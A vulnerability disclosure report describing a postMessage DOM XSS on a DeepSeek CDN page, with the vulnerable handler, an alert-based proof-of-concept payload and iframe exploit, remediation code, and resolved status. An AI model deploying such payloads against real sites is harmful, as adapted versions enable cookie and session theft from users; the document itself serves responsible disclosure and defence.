During routine analysis, a DOM-based Cross-Site Scripting (XSS) vulnerability was identified on DeepSeek's CDN endpoint: https://cdn.deepseek.com/usercontent/usercontent.html. The vulnerability stems from improper handling of postMessage events, allowing an attacker to inject malicious scripts into the document context without proper origin validation or input sanitization.
https://cdn.deepseek.com/usercontent/usercontent.html
The postMessage implementation on the affected endpoint processes messages without verifying their origin or properly sanitizing input. The following code snippet illustrates the root cause of the issue:
window.addEventListener("message", (e) => {
const keys = Object.keys(e.data);
if (keys.length !== 1) return;
if (!e.data.__deepseekCodeBlock) return;
document.open();
document.write(e.data.__deepseekCodeBlock);
document.close();
const style = document.createElement("style");
style.textContent = "body { margin: 0; }";
document.head.appendChild(style);
});The function directly writes any __deepseekCodeBlock payload into the document using document.write, bypassing essential security measures such as:
- Origin Validation: No check to ensure the
postMessageevent originates from a trusted source. - Input Sanitization: No filtering or escaping of HTML/JavaScript content in the payload.
The following postMessage payload can exploit the vulnerability to execute arbitrary JavaScript:
postMessage(
{ __deepseekCodeBlock: '<script>alert(origin)</script>' },
"*"
);For easier testing, an iframe-based PoC was created to demonstrate the issue:
<iframe
width="600px"
height="600px"
src="https://cdn.deepseek.com/usercontent/usercontent.html"
onload="this.contentWindow.postMessage( ({ __deepseekCodeBlock: '<script>alert(origin)</script>'}) ,'*')"
>
</iframe>When this payload is executed:
- The browser processes the malicious payload.
- An alert box is displayed showing the
origin, confirming the ability to inject and execute arbitrary JavaScript.
- Open
https://cdn.deepseek.com/usercontent/usercontent.htmlin your browser. - Open the browser console and execute:
window.postMessage( { __deepseekCodeBlock: '<script>alert(origin)</script>' }, "*" );
- Alternatively, save and load the provided iframe-based exploit code in a browser.
-
Validate Message Origin: Ensure that the
postMessageevent'soriginmatcheshttps://cdn.deepseek.com:window.addEventListener("message", (e) => { if (e.origin !== "https://cdn.deepseek.com") return; // Handle the message securely const data = e.data; // Example: Sanitize and insert content if (data && data.__deepseekCodeBlock) { const sanitizedContent = DOMPurify.sanitize(data.__deepseekCodeBlock); const codeBlock = document.createElement("pre"); codeBlock.textContent = sanitizedContent; document.body.appendChild(codeBlock); } });
-
Sanitize User Input: Use a library like DOMPurify to sanitize the HTML content before inserting it into the DOM. This helps prevent XSS attacks:
const sanitizedContent = DOMPurify.sanitize(e.data.__deepseekCodeBlock);
-
Avoid
document.write: Replacedocument.writewith modern DOM manipulation methods:const codeBlock = document.createElement("pre"); codeBlock.textContent = sanitizedContent; document.body.appendChild(codeBlock);
- Date of Discovery: January 31, 2025, 7:45:00 PM CST (Central Standard Time)
- Reported To DeepSeek: Yes
- Acknowledgment: Resolved
- Patch Status: Updated
This vulnerability allows attackers to execute arbitrary JavaScript in the context of cdn.deepseek.com. Potential impacts include:
- Theft of sensitive user data (e.g., cookies or session tokens).
- Defacement or injection of malicious content.
- Further exploitation of users accessing the compromised page.